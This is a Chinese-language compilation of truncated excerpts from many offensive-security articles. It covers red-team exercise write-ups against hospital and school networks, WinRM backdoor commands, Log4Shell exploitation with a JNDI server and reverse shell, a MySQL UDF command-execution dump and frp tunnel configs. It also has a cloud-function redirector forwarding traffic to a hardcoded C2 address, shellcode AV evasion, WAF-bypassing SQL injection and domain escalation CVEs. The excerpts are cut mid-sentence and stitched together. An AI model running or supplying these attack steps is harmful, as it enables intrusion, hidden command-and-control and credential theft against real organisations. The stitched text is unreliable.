红队攻击面相关讨论

攻击技战法 [list] 云上攻击技战法 https://hackingthe.cloud/[doc] 红队技术实战 https://ired.team/威胁情报 Threat Intelligence[list] https://github.com/hslatman/awesome-threat-intelligence红队框架/工具集 Redteam Framework[tool] Utilities for MITRE™ ATT&CK https://github.com/nshalabi/ATTACK-Tools[tool] 好用的渗透工具列表 https://github.com/enaqx/awesome-pentest[book] KALI渗透 https://jobrest.gitbooks.io/kali-linux-cn/content/[paper] ATT&CK 发布了七款安全产品的评估 https://medium.com/mitre-attack/first-round-of-mitre-att-ck-evaluations-released-15db64ea970d[doc] 红队技术实战 https://ired.team/[tool] 红队框架 https://ired.team/offensive-security/red-team-infrastructure/automating-red-team-infrastructure-with-terraform[cheatsheet] …

本文仅对影视剧中涉及的技术进行分析，对剧情不做详细的说明。感兴趣的童鞋可以去看看。PS: 技术分析按照剧情顺序进行（1~4）集前言电视开头，便给我展示了第一种攻击技术，恶意充电宝。看似利用充电宝给手机充电，但是在充电的过程中，便已经获取了用户的信息。 实现原理 这种方法，在我前面的文章中有所涉及《利用树莓派监控女盆友手机》，其实很简单，就是利用adb命令获取手机的信息，当然也可以利用adb命令安装shell。 实现难度 容易，只需要开启手机开发者先选即可。 但是在现实中，手机开发者选项是默认关闭的。像电视中的情形是不会实现的。 信息收集基于朋友圈收集信息 通过对朋友圈非朋友可见十条 查看最近朋友圈的动态，获取对方的相关的信息。再加上推测，得知女主老公出轨的可能性。表哥建议 非工作需要，还是尽量在微信中，将此功能关闭吧。 基于微信步数的信息收集 通过微信步数，可以获取当前在干嘛？如早上八点你刚睡醒，好友的步数已达到5000步，说明他很有可能在跑步锻炼身体。基于钓鱼链接的信息收集 在表哥前面的文章中，也写过类似的文章。通过探针可以简单的获取目标的IP地址，GPS信息，以及照片，录音等等。但是随着手机安全性能的提高，都会有弹窗提示。利用百度网盘备份数据 这个在生活中，常常遇到。而且在安装百度网盘后，备份通讯录等信息是默认开启的。可以一试！（最好将头像也换掉，这样才真实）利用滴滴分享行程 通过以上方案，主人公成功得到了对方的手机号码，并通过微信查找到了相关的账号。当然网安专家的电脑中毒了。 对驱动盘符的破解 这里当然是导演给了…

0x01 外网打点资产发现多测绘平台搜索 https://hunter.qianxin.com/ https://fofa.info/ https://quake.360.cn/ 多语法搜索 假如某个目标站点为xxxx.com ，我们可以通过不同的语法进行资产搜集，搜集的资产会更全面 这里以fofa为例 domain="xxxx.com" host="xxxx.com" header="xxxx.com" cert="xxxx.com" 敏感信息泄露对于学校站点的信息搜集，一般来说外网能拿直接权限的点已经很少了，web应用大多是放在vpn后面，因此能弄到一个vpn账号可以说是事半功倍，这时候可以通过语法对此类信息进行挖掘 常用命令如下： #google语法 site:*.edu.cn intext: vpn | 用户名 | 密码 | 帐号 | 默认密码 #github *.edu.cn password 在这次攻防演练里，也是幸运找到了某站点VPN的默认口令，使用的是 姓名拼音/12345678 弱口令 默认口令对于部分站点，在搭建完成后可能没有更改默认账号密码，这时候可以尝试使用默认账密登录 下面列举一些常见的web站点默认口令 账号： admin administrator root user test 密码： admin admin123 123456 123 test root 对于一些应用广泛的系统，可以通过google语法搜索其默认密码 这里通过sysadmin/1 成…

WinRM实现端口复用这种攻击方式前提是需要帐号和密码，如果在获得hash的情况下也可以利用evil-winrm来实现hash登录 服务介绍WinRM全称是Windows Remote Management，是微软服务器硬件管理功能的一部分，能够对本地或远程的服务器进行管理。WinRM服务能够让管理员远程登录Windows操作系统，获得一个类似Telnet的交互式命令行shell，而底层通讯协议使用的是HTTP。 后门应用在windows2012服务器中，winrm默认启动，开启了5985端口，在2008系统中需要手动开启服务 winrm quickconfig -q启动后防火墙也会放行该端口 设置启用httplistener监听并存 winrm set winrm/config/service @{EnableCompatibilityHttpListener="true"} //80 winrm set winrm/config/service @{EnableCompatibilityHttpsListener="true"} //443 修改监听端口为80/443 winrm set winrm/config/Listener?Address=*+Transport=HTTP @{Port="80"} winrm set winrm/config/Listener?Address=*+Transport=HTTPS　 @{Port="443"} 本地连接也需要开启WinRM服务，然后设置信任连接的主机， winrm quickc…

0x00 前言2022.8.X单位突然通知参与某行业专项攻防演练，本着学习的目的参与了一波，特此记录。 0x01 打点获得目标单位名称 先通过爱企查、天眼查等工具查询目标及目标下属单位信息 可以利用工具：ENEScan_GO 接着就是信息收集三板斧 子域名、IP、端口 收集子域名：OneForAll（API要配置全一点）、Subfinder、FOFA、Hunter 收集IP：Eeyes、domain2ip 端口扫描：Goby、Nmap、Masscan 这里使用的是Goby全端口扫描，扫描速度堪忧，但优点是比较全面且展示效果较好。 端口扫描后筛出Web类与非Web类端口，便于精确打击。 Web类可以先统一进行指纹识别，优先攻击一些重点的框架系统 比如（Shiro、通达OA、用友NC等） 非web类可以筛出来进行服务爆破，一些特殊的端口可以优先摸一下试试，比如6379 Redis 0x02 获取突破口一番操作之后，通过以上打点，得到了一个Shiro框架的系统，这个系统是访问路径后默认跳转到SSO平台进行登录的。想进入该系统，入口必须是走SSO平台登录验证后进入。但是经过手工口令测试，发现通过弱口令进SSO系统有点困难，战略性放弃。 先利用Shiro反序列化工具查看是否存在RCE漏洞。 这边给个建议，不同工具可能不一定能抛出Key和利用链，大家在进行测试的时候，手里尽量多换几个工具来测试，我这里换了三个工具才跑出Key和利用链，其他的工具就是跑不出（不是Key字典的问题，就是单纯跑不出。。。） Linux机子，whoami Root权限，…

0x00 写个开头凑字数这次攻防打的还是比较有意思的，开局电脑摆烂恼火的很，最后没电脑只能拿着销售的电脑疯狂输出。 去拿电脑没一会的功夫我们的私有目标就被干出局了，这次的规则还是有点问题按系统分给各个队伍，不是按照目标单位分的，别人分到我们私有目标的部分系统基础分和数据分薅完一下被干出局了，后面再打只有100路径分，还有老6盯着我们的私有目标打，有个泛微office的洞我们手上没有，目标一放出来就穿了，怪自己太菜了。 排名最后还算理想吧最终排名第三，跟两个技术大哥没后端支撑的情况排到前三还是可以的，前面两位重量级选手卷不过啊，一个提交0day另外一个后端支撑有名的卷，最后前两名分数比我们高出一半多。 废话讲完了，开始我们的内容，码打的严师傅们勿怪，文章最后欢迎师傅们留下评论来交流。 0x01 目标某医院外网弱口令第一天分了私有目标和公共目标，这个目标是公共池目标，运气也是比较好外网一个弱口令直接进去了，主要就是要知道IP地址，突破到内网这里没啥技术含量，目标给的是一个官网的地址，估计其他队伍的师傅们都去冲云上官网那个IP了，后面云上的我们也通过信息科专用共享服务器上密码文件拿到了所有权限。 攻击路径 下面我会按照上面图上标记的序号说明内网攻击过程 路径1/路径2 外网弱口令这里说下这个目标IP怎么来的，通过IP地址收集C段信息找到h3c设备，默认审计账号密码登陆上去命令控制台查看对应授权信息确定是目标IP地址，但是审计账号没有配置权限没法做vpn隧道这些，所以做了个全端口扫描发现一个非标准端口的ssh弱口令，这里拿到服务器权限后我先做了…

EasyPOP题目环境是 php 7.4, 图省事直接把所有属性的类型都改成 public 起点是 sorry 类的 __destruct(), 由 echo $this->hint 调用到 show 类的 __toString() 方法, 然后通过执行 $this->ctf->show() 跳转 secret_code 类的 __call() , 进而到 show() 方法, 在 show() 方法中访问不存在的属性, 跳转到 sorry 类的 __get(), 最后通过 $name() 跳到 fine 类的 __invoke() pop 链构造如下 <?php class fine { public $cmd; public $content; } class show { public $ctf; public $time; } class sorry { public $name; public $password; public $hint; public $key; } class secret_code { public $code; } $e = new fine(); $e->cmd = 'system'; $e->content = 'cat /flag'; $d = new sorry(); $d->key = $e; $c = new secret_code(); $c->code…

外网进内网通常就是通过web漏洞拿取shell 内网的很大一部分信息收集是围绕网络拓扑图展开的。可以社工运维或者google找一下。 内网扩散信息收集概述 内网信息收集内网网端信息：对内网进行拓扑、分区内网大小内网核心业务信息oa系统、邮件服务器、监控系统....其他Windows、linux主机信息收集内网信息收集做的越好，打的越快 常用方法主动扫描。常用工具: nmap,netdiscover,nc,masscan,自写脚本等常用端口和服务探测内网拓扑架构分析。如dmz,测试网等命令收集本机信息 一般都是先扫80端口等。因为外网网站可能做的很好，内网网站烂的爆，sql注入、xss等web漏洞一把一把的。 主动扫描ping命令扫描内网中的存活主机优点:方便，一般不会引起流量检测设备的报警缺点：扫描速度慢，目标开了防火墙会导致结果不准nmap扫描存活主机(icmp扫描)nmap -sn -PE -n -v -oN 1.txt 目标ip参数： -sn 不进行端口扫描;-PE 进行icmp echo扫描;-n 不进行反向解析;-v 输出调试信息;-oN输出nmap 扫描存活主机(arp扫描)nmap -sn -PR -n -v 目标IP参数：-PR代表arp扫描，在内网中arp扫描速度最快且准确率高使用netdiscover扫描(arp扫描工具，既可以主动扫描也可以被动嗅探)netdiscover -i eth0 -r 目标IP参数说明:-i:指定一个接口;-r∶指定扫描范围注意: netdiscover时间越久越精确，可以发现某一台主机在一…

ARP攻击协议简介ARP全称为Address Resolution Protocol，即地址解析协议，它是一个根据IP地址获取物理地址的TCP/IP协议，主机发送信息时将包含目标IP地址的ARP请求广播到网络上的所有主机，并接收返回消息，以此确定目标的物理地址，收到返回消息后将该IP地址和物理地址存入本机ARP缓存中并保留一定时间，下次请求时直接查询ARP缓存以节约资源。 ARP地址解析协议是建立在网络中各个主机互相信任的基础上的，网络上的主机可以自主发送ARP应答消息，其他主机收到应答报文时不会检测该报文的真实性就会将其记入本机ARP缓存，故而攻击者可以向某一主机发送伪ARP应答报文，使其发送的信息无法到达预期的主机或到达错误的主机，这就构成了一个ARP欺骗。 工作原理环境假设主机A： IP地址：192.168.1.1MAC地址：0A-11-22-33-44-01主机B： IP地址：192.168.1.2MAC地址：0A-11-22-33-44-02工作流程第1步：根据主机A上的路由表内容，确定用于访问主机B的转发IP地址是192.168.1.2，然后A主机在自己的本地ARP缓存中检查主机B的匹配MAC地址第2步：如果主机A在ARP缓存中没有找到映射，它将询问192.168.1.2的硬件地址，从而将ARP请求帧广 播到本地网络上的所有主机，源主机A的IP地址和MAC地址都包括在ARP请求中，本地网络上的每台主机都接收到ARP请求并且检查是否与自己的IP地址匹配，如果主机发现请求的IP地址与自己的IP地址不匹配，它将丢弃ARP请求第3步：…

前言在内网渗透时，一个WebShell或CobaltStrike、Metasploit上线等，只是开端，更多是要内网横向移动，扩大战果，打到核心区域。但后渗透的前提是需要搭建一条通向内网的“专属通道”，才能进一步攻击。可实战中因为网络环境不同，所利用的方式就不同。 本文内容按以下思维导图展开 目标出网（socks代理）这是实战中最愿意碰到的网络环境，目标机可以正常访问互联网，可直接在目标机挂socks代理或CobaltStrike上线，打通目标的内网通道。 frp(socks5)frp服务端配置文件 [common]bind_port = 8080 frp客户端配置文件 [common]server_addr = xx.xx.xx.xxserver_port = 8080#服务端口使用Web常见端口[socks5]type = tcpremote_port = 8088plugin = socks5use_encryption = trueuse_compression = true#socks5口令#plugin_user = SuperMan#plugin_passwd = XpO2McWe6nj3 此处添加了加密压缩这两个功能，默认是不开启的，根据作者介绍，压缩算法使用的是 snappy。 use_encryption = true 启用加密 [通信内容加密传输，有效防止流量被拦截] use_compression = true 启用压缩 [传输内容进行压缩，有效减小传输的网络流量，加快流量转发速度，但会额外消耗一些CPU资…

0x00 红队基础知识一、构建一个大型内网域环境搭建父域控制器子域控制器辅域控制器域内主机域内服务器二、Windows NTLM（NT LAN Manager）认证原理Kerberos 域内认证原理0x02 内网信息搜集篇一、工作组和大型域内网如何进行信息搜集如何搜集本机密码 MySQLSQL Server... ...Linux 如何搜索特定的密码文件搜集指定用户的命令历史记录中的各种明文密码Windows 2012 高版本以上如何搜集密码 Windows 2012 版本以下如何搜集密码 关于 Linux 下如何搜集各种密码信息 无线密码抓取 组册表里各种健值敏感信息 搜集数据库中保存的各类高价值账号密码 搜集保存在目标系统本地各种文档中的明文密码 针对各类常用 windows 办公软件的各类密码搜集 如何搜集VPN密码 如何搜集浏览器相关凭证 Chrome 浏览器抓取凭证Firefox 浏览器抓取凭证360 浏览器抓取凭证IE 浏览器抓取凭证如何搜集各种数据库信息 通过 LDAP 定位核心机器通过 LDAP 获取内网架构分布通过 LDAP 获取内网组织架构通过 LDAP 获取域内核心机器Mysql SQL Server Oracle PostgreSQL LDAP 根据当前跳板机器搜集网络环境（判断那种协议出网） 获取当前系统的详细IP配置，包括所在域, ip, 掩码, 网关, 主备 dns ip 获取当前系统最近的用户登录记录 获取当前用户的所有命令历史记录（针对于 Linux） 远程截屏捕捉目标用户敏感操作 获取当前机器环境变量（…

前言一次攻防演练中首先是团队拿到了一个 Webshell ，后续又把权限弹到了 CobaltStrike 方便我来做内网渗透： 通过发现当前机器是一台公网服务器，只有公网 IP：xxx.xxx.xxx.16 通过查看 arp 缓存发现当前是有一些公网机器的： 通过查询这些 IP 发现是"某网络"，而且通过 Nbtscan 发现当前 C 段有主机存活：（初步判断当前 C 段机器有可能存在域，但不确定） 对当前第一层内网机器 C 段进行横向移动由于是攻防演练，拿到越多的分数越好，在这里就不考虑一些其他问题，拿到当前机器后我抓到了明文密码： 但是通过此密码去利用 MSF 对 C 段进行密码喷洒发现没有一台主机被成功横向出来： 就在这个时候我又扫了一下看看有没有 MS17010：（一般来说向这种"某某网"基本上都有几台存在永恒之蓝，所以直接去扫就行） 发现 92、151、200 这三台是存在 MS17010 的，随后打了 92 这台： 随后 MSF 和 CS 联动，我把 MSF 的 shell 又弹到了 Cs，并且做了权限维持： 这个时候其实用这两台跳板机器就够了，另外两台存在 MS17010 没必要继续打，随后我对当前 C 段进行信息搜集，对 Web 资产进行扫描存活发现大量 Web 资产： 通过手工分析发现一枚 SQL 注入，而且是 DBA 权限： 然后添加了一个管理员用户然后开启了 3389 （因为有诺顿，常规免杀没时间弄了，主要拿分，索性直接登录服务器） 而且直接通过 socks 连接不了，感觉是做了限制，后续发现使用 msts…

网络拓扑 信息搜集渗透测试第一步当然是信息搜集 拿到 IP192.168.81.151我们先使用nmap对他进行常规TCP端口的扫描 nmap -v -Pn -T3 -sV -n -sT --open -p 22,1222,2222,22345,23,21,445,135,139,5985,2121,3389,13389,6379,4505,1433,3306,5000,5236,5900,5432,1521,1099,53,995,8140,993,465,878,7001,389,902,1194,1080,88,38080 192.168.81.151 发现开放了22,38080这两个端口 通过nmap我们可以得知这是一台Ubuntu，22是ssh，而38080这个端口是unknown的，我们尝试访问一下 于是尝试最近爆出的新漏洞 CVE-2021-44228 尝试看看能不能获取到 dnslog 发现存在 CVE-2021-44228漏洞，尝试去获取一个shell CVE-2021-44228 利用首先在我们的VPS kali(192.168.81.133) 开启一个LDAP： git clone https://github.com/black9/Log4shell_JNDIExploit.git java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.81.133 然后在kali上nc监听9999端口： 我们使用TOMCATBYpass进行反弹shell /bin/ba…

一、前言一般安全都属于运维部下面，和上家公司的运维总监聊过几次一些日常安全工作能不能融入到DevOps中，没多久因为各种原因离职。18年入职5月一家第三方支付公司，前半年在各种检查中度过，监管形势严峻加上大领导对安全的重视(主要还是监管)，所有部门19年的目标都和安全挂钩。由于支付公司需要面对各种监管机构的检查，部分安全做的比较完善，经过近一年对公司的熟悉发现应用安全方面比较薄弱。这部分业内比较好的解决方案就是SDL，和各厂商交流过之后决定自己照葫芦画瓢在公司一点一点推广。 上图为标准版的SDL,由于运维采用DevOps体系，测试也使用自动化进行功能测试，版本迭代周期比较快,安全人手不足加上对SDL的威胁建模等方法也一头雾水、如果把安全在加入整个流程会严重影响交付时间。在这种情况调研了一些业内的一些做法，决定把SDL精简化 。精简版SDL如下： . 二、精简版SDL落地实践安全培训SDL核心之一就是安全培训，所以在安全培训上我们做了安全编码、安全意识、安全知识库、安全SDK 安全编码：我们在网上找了一些java安全编码规范、产品安全设计及开发安全规范结合公司实际业务出了一版。 因为各种监管机构对培训都有要求，借此推了一下安全培训，定期对开发和新员工入职的培训。 安全意识：公司有企业微信公众号，大部分员工都关注了，在公众号推广了一波。 宣传完之后答题，答题满分送小礼品 因为人手不足，而功能测试和安全测试本质上有很多相通的地方，测试部门也比较配合，针对测试人员做了一些安全测试相关的培训，但是效果并不是太理想。 安全知识库：在漏洞修…

最近挖了一些漏洞。虽然重复了，但是有参考价值。这边给大家分享下。　　漏洞重复还是很难受的，转念一想，人生从不是事事如人意的，漏洞重复忽略，不代表失败。先来后到很重要，出场顺序很重要。 　　1.某站rce 忽略理由:不在范围内 作者神父&me 感谢神父带我 　　测试域名:https://***.***:8089/ 　　同时存在CVE-2017-11357 CVE-2019-18935 CVE-2017-9248漏洞 　　漏洞利用exp下载地址: 　　https://github.com/noperator/CVE-2019-18935 　　https://github.com/noperator/CVE-2019-18935.git 　　延迟11s:sleep 11s: 　　测试代码: test.c 　　 #include <windows.h> #include <stdio.h> BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved) { if (fdwReason == DLL_PROCESS_ATTACH) //Sleep(10000); // Time interval in milliseconds. Sleep(11000); return TRUE; } test.c编译成amd642.dll文件 运行: python CVE-2019-18…

0x01 前言这是一款burp插件，用于Outlook用户信息收集，在已登录Outlook账号后，可以使用该 插件自动爬取所有联系人的信息 0x02 安装在burp扩展面板加载jar即可 0x03 功能介绍1.All Users加载插件后，进入Outlook联系人面板，点击All Users 在burp中 Proxy -> HTTP history 筛选api接口 /owa/service.svc?action=FindPeople&app=People 选中该请求，右键菜单 Extensions -> OutLook information collection -> Do OoutLook Email scan 会在 Extender -> Extensions -> OutLook information collection -> Output 中显示扫描进度 插件会自动爬取所有数据包并生成目录树，可以查看每一个请求响应包 右击该请求会弹出右键菜单，选择获取所有用户邮箱，即可获得所有的邮箱 2.注意 该Api会有大量相同url，不同的Post提交参数，如果选错了Api接口，会有弹窗提示 3.联系人信息 必须在加载 All Users的所有数据包才能正常使用，联系人信息基于All Users数据包信息，如果未进行第一步操作会有弹窗提醒 在burp中 Proxy -> HTTP history 筛选api接口 /owa/service.svc?actio…

工具准备jexboss Kali Linux CS 4.3 Windows杀软在线查询一 Windows杀软在线查询二 Windows杀软在线查询三 fscan 潮汐shellcode免杀 LSTAR CobaltStrike其他插件 PEASS-ng PrintSpoofer 外网打点1、为了练习内网横向，悄悄的盯上国外的站点 2、发现jboss网站存在反序列化漏洞，是呀jexboss无法利用成功 python jexboss.py -u https://xx.xx.xx/3、使用工具java反序列化终极测试工具 by 6哥成功利用 4、查看当前用户whoami，普通用户 5、查看IP地址ipconfig 6、查看是否有杀软tasklist /svc 7、将查询的内容粘贴到Windows杀软在线查询，发现存在杀软 8、查看服务器是否出网ping www.baidu.com，很不错，服务器出网 CS上线1、因为有杀软，我们要考虑绕过，直接上传CS木马肯定是不行的，本次绕过的是潮汐shellcode免杀，因为很多github上利用python打包的exe文件太大，上传很慢，而潮汐shellcode免杀文件较小，上传快。 2、CS先生成c语言的shellcode 3、将shellcode内容复制到潮汐网站上，生成的exe上传到目标机器，然后执行命令 C:\\usr\\desarrollo\\jboss-5.1.0.GA\\server\\sigAmeServer\\deploy\\ROOT.war\\TideAv…

前言看到了某篇关于站库分离类型站点相关的讨论，想总结下信息收集的技巧。 正文关于站库分离类型站点网上暂时没有找到总结性的文章，所以想尝试记录下关于站库分离类型站点的渗透思路。 对站库分离类型站点通常可以有两个渗透入口点: 1.web 网站 2.数据库渗透思路其实也是比较常规。但是这里如果两个入口点无非两种路径。 从 web 网站打入进而打站库分离的数据库，内网渗透从数据库打入进而打站库分离的 web 网站，内网渗透根据不同的路径定制不同的渗透测试方案，下面记录一下流程和容易遇到的问题。 一、从 web 入口渗透 从 web 入口通常就是通过网站的各种漏洞来 getshell，比如文件上传、命令执行、代码执行、还有 SQL 注入写入一句话（into outfile、日志备份等）。 在获得 web 权限或者有诸如文件读取等漏洞时，我们还读数据库配置文件、对数据库内容分析、查找数据库备份，进而对数据库目标 ip 进行渗透，以便后续操作。 二、从数据库入口渗透 但是这里要说主要是外网暴露的数据库入口点弱口令；web 网站 SQL 注入。 从数据库入口渗透，同样主要是为了获取更大的权限，或者扩展我们的渗透成果，比如从数据库里可以得到一些密码信息，用户名等，在后续的内网渗透中可以很有效的帮助我们。 站点是站库分离的，数据库和 web 不在同一台服务器上，这时候不能写入一句话木马通过 web 去连，因为路径没有用。如果是从 web 端找到的 SQL 注入，那么可以通过以下这些方式去做信息收集、获取权限。 1.MYSQL（1）定位 web 端 ip 地址…

首先，我们需要登录腾讯云，开启云函数。 登录腾讯云后，搜索云函数。开通即可。 初次登录，需要授权。 登录控制台后，点击新建。 函数名称随意，选择从头开始，环境填Python3.6，选完后下拉，把代码搞里头。 复制下面代码，并修改服务器地址。 # coding: utf8 import json,requests,base64 def main_handler(event, context): response = {} path = None headers = None try: C2='http://43.134.164.72:80' if 'path' in event.keys(): path=event['path'] if 'headers' in event.keys(): headers=event['headers'] if 'httpMethod' in event.keys() and event['httpMethod'] == 'GET' : resp=requests.get(C2+path,headers=headers,verify=False) else: resp=requests.post(C2+path,data=event['body'],headers=headers,ve…

概述通过替换认证信息后重放请求，并对比数据包结果，判断接口是否存在越权漏洞 特点 支持HTTPS自动过滤图片/js/css/html页面等静态内容多线程检测，避免阻塞支持输出报表与完整的URL、请求、响应安装和使用 安装依赖 git clone https://github.com/y1nglamore/IDOR_detect_tool.git启动 即可监听socks5://127.0.0.1:8889。 安装证书 使用SwitchOmega等插件连接该代理，并访问mitm.it即可进入证书安装页面，根据操作系统进行证书安装。 以MacOS为例： 下载安装后，打开钥匙串访问，找到mitmproxy证书，修改为alwaystrust 检测漏洞 首先准备好目标系统的A、B两账号，根据系统的鉴权逻辑（Cookie、header、参数等）将A账号信息配置config/config.yml，之后登录B账号 使用B账号访问，脚本会自动替换鉴权信息并重放，根据响应结果判断是否存在越权漏洞 生成报表 每次有新漏洞都会自动添加到report/result.html中，通过浏览器打开： 点击具体条目可以展开/折叠对应的请求和响应： 检测逻辑 原文连接：https://github.com/y1nglamore/IDOR_detect_tool

0 前言实战案例还原《BumbleBee Roasts Its Way To Domain Admin》一文详细的描述了一次渗透案例，但其文章组织架构建立在ATT&CK框架上，而不是按照时间线逻辑来组织，因此对于渗透人员了解学习其前后过程有些困难，特此梳理一番，按照时间线还原实战。 《BumbleBee Roasts Its Way To Domain Admin》原文链接 1 第一天（Day1）1.1 样本投递看起来是通过邮件中的下载链接投递到的目标环境中的机器，该样本是一个有密码的压缩包。解压缩后释放文件BC_invoice_Report_CORP_46.iso。当挂载这个ISO文件，会释放一个LNK文件documents.lnk，当双击这个快捷方式时会执行隐藏的恶意加载器。快捷方式的目标如下： 1.1.1 rundll32解析使用rundll32加载执行是常用渗透套路，可以执行dll中的程序，一般还可以用来获取shell： set srvhost 10.x.x.x exploit 1.2 加载恶意程序大黄蜂（BumbleBee）加载器大黄蜂（BumbleBee）返回Cobalt Strike Session，攻击者利用这个Cobalt Strike的shell释放wab.exe，该可执行文件将有wmi执行。 wab.exe将恶意代码注入到其他两个进程explorer.exe和rundll32.exe中。这里根据原文来看使用的是远线程注入，及使用经典的OpenProcess、VirtualAlloc、WriteProc…

0x00 环境Linux主机www权限主机无法出外网正向代理无法使用B段内网0x01 收集信息F-Scrack.py获取Redis, ES等 PS: Scrack.py的mssql模块爆破不准确，可以自己写一个简单的 python Scrack.py -h 10.111.1.1-10.111.2.254 -p 3306,5432 -m 200 -t 61.Rediskey较多的时候不要使用keys * 查看基本信息: master，数量，版本号 使用scan查看keys: scan 0 match * count 100 查看类型: type <key> hash类型: hgetall <key>2.MySQLwindows下可以先测试是否可写入插件目录: select @@plugin_dir; select hello into outfile <plugin_dir>;然后使用msf的自带的udf，先转换为16进制，然后导出到插件目录: use test; set @a=concat('', 0x<hex_of_exe>); create table Ghost(data LONGBLOB); insert into Ghost values(""); update Ghost set data = @a; select data from Ghost into DUMPFILE <dir>; create function sys_eval returns strin…

0x00 前言本文将以阿里云为例，对云服务中的一些攻防手法进行演示，首先利用 Terraform 进行 ECS SSRF 漏洞环境的搭建，然后通过实例中存在的 SSRF 漏洞一步步拿下该云服务账户的所有的阿里云服务权限。 0x01 环境搭建本文采用 TerraformGoat 进行靶场的搭建，TerraformGoat 靶场地址：https://github.com/HuoCorp/TerraformGoat(opens new window) 在部署靶场时，需要用到你的阿里云 AccessKey，为了避免影响到你的云上生产环境，因此这里强烈建议使用非生产环境的 AccessKey，不要和生产环境使用同一个账号。 由于 TerraformGoat 工具的迭代更新，下述环境搭建的方法已失效，现在部署的方法更加方便友好，具体部署方法请参见上面的 TerraformGoat 靶场地址。 接下来开始搭建靶场，首先克隆靶场项目到本地，并构建下载靶场所需的依赖。 git clone https://github.com/HuoCorp/TerraformGoat.git --depth 1 cd TerraformGoat docker build . -t terraformgoat:v0.0.3 docker run -itd --name terraformgoat terraformgoat:v0.0.3 docker exec -it terraformgoat /bin/bash如果 github 访问较慢，可以给终端挂上代理 proxy…

一些朋友在群里经常遇到sql注入的问题，有时候有waf、有时候是盲注、有时候不知道如何下手? 今天分享一款工具，名字是超级注入工具 下载地址： https://github.com/shack2/SuperSQLInjectionV1 案例1: 带waf的盲注 如下图，单引号报错，而且有报错回显，这种情况利用就是典型的布尔盲注，只要我们能在后面构造一个 and 1=1 或者 or 1=1这种语句，就能出数据 这里是mysql的数据库，通常借助if函数来布尔注入，waf通常不拦单个if()，但会拦if(1,1,1)这种，如果拦了，可以把1替换成11-10，2替换成12-10这种 然后，超级注入工具一把梭就行了， 绕过waf正则就下面这种，比较简单 案例2: 案例1构造的and是为了超级注入工具去识别页面返回的内容，去判断出 1=1正确的页面字段和1=2错误页面的字段，正常工具是识别不到注入点的，所以你要指定字段，给工具一个布尔注入的依据！ 再来看一个例子，希望你能理解我的意思，， 如下图，还是mysql，成功构造出一个if 报文贴入超级注入工具，这款工具测试盲注只会测试1=1和1=2,所以，在if的第一个位置设置payload，看右下角的框，已经识别到正确页面的回显值，那后面，数据就出来了！ 案例3: 这里提供一个mssql类型的， 也就是Sql-server，站点存在waf,测试oR 1=1 和 1=2这种不拦截，利用1=1这里构造下数据…

1.MS14-068 kerberos认证，no PAC 用户在向 Kerberos 密钥分发中心（KDC）申请TGT（由票据授权服务产生的身份凭证）时，可以伪造自己的 Kerberos 票据 漏洞效果： 将任意域用户提升到域管权限 利用条件： 1.小于2012R2的域控 没有打MS14-068的补丁(KB3011780) 2.拿下一台加入域的计算机 3.有这台域内计算机的域用户密码和Sid 利用方式： 在《Kerberos认证及过程中产生的攻击》一文中有详细讲 这可以看 https://cloud.tencent.com/developer/article/1760132 2.CVE-2020-1472 NetLogon特权提升漏洞(CVE-2020-1472)是一个windows域控中严重的远程权限提升漏洞。 Netlogon使用的AES认证算法中的vi向量默认为0，导致攻击者可以绕过认证，同时其设置域控密码的远程接口也使用了该函数，导致 以将域控机器用户的password设置为空。 这样我们就可以导域管hash，最后再还原域控机器用户的密码 漏洞效果： 可利用此漏洞获取域管访问权限 影响版本： 利用方式： https://cloud.tencent.com/developer/article/1780108 https://cloud.tencent.com/developer/article/1837483 3.CVE-2021-42287&42278 Windows域服务权限提升漏洞（CVE-2021-42287, CV…